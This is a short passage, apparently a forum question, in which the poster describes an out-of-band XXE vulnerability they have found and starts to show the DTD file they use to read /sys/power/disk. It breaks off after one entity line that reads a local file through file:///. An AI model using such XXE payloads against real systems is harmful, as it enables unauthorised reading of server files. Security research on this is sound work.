XXE OOB File Content Extraction
Currently, I’ve discovered an OOB XXE that allows me to include a .dtd file to extract the content of a particular system file, for instance, /sys/power/disk.
So my file.dtd is:
<!ENTITY % data SYSTEM "file:///sys/power/disk">
<…